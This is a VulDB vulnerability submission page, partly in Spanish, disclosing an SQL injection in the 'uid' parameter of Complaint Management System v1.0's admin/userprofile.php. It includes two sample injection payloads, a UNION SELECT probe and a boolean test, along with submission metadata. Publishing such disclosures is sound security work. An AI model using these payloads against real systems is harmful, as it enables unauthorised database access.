Enviar #114547: Complaint Management System v1.0 /Complaint Management System/admin/userprofile.php GET parameter uid exists SQL injection vulnerabilityinformación

TítuloComplaint Management System v1.0 /Complaint Management System/admin/userprofile.php GET parameter uid exists SQL injection vulnerability
DescripciónAn issue was discovered in Complaint Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /Complaint Management System/admin/userprofile.php?uid. Payload1:uid=1' union all select null,null,null,null,concat(0x414243,0x515253,0x616263),null,null,null,null,null,null,null,null-- - Payload2:uid=1' and 666=666 and 'p'='p
Fuente⚠️ https://github.com/winkle175/bug_report/blob/main/SQLi-1.md
Usuario
 808bass (UID 45010)
Sumisión2023-04-15 05:45 (hace 3 años)
Moderación2023-04-15 09:07 (3 hours later)
EstadoAceptado
Entrada de VulDB226097 [SourceCodester Complaint Management System 1.0 GET Parameter /admin/userprofile.php uid inyección SQL]
Puntos19

AnteriorVisión De ConjuntoPróximo

Interested in the pricing of exploits?

See the underground prices here!